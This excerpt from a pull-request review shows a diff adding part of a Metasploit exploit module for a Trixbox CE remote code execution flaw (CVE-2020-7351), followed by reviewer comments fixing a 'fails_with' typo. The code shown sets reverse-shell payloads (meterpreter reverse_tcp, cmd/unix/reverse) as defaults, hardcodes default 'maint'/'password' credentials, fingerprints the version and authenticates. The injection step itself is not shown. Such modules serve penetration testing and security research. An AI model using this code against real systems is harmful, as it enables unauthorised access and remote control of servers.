modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,182 @@
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'References' => [
+          ['CVE', '2020-7351'],
+          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/13353'] # First ref is this module
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => 'Apr 28 2020',
+        'Targets' =>
+          [
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(res)
+    version = res.body.scan(/v(\d\.\d)/).flatten.first
+    print_good("#{peer} - Trixbox CE v#{version}.x identified.")
+    if Gem::Version.new(version).between?(Gem::Version.new('2.6'), Gem::Version.new('2.8'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0'), Gem::Version.new('2.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version) == Gem::Version.new('1.2')
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      return res
+    elsif res.code == 401
+      fail_with(Failure::NoAccess, 'Authentication failed.')
+    else
+      fails_with(Failure::UnexpectedReply, "The host responded with an unexpected status code: #{res.code}.")
```

Comment:
Shouldn't this be `fail_with`?

Reply:
Fixed

Reply:
`login` has been slightly updated (removed that `fail_with()`).

Reply:
Looks good! Marking as resolved.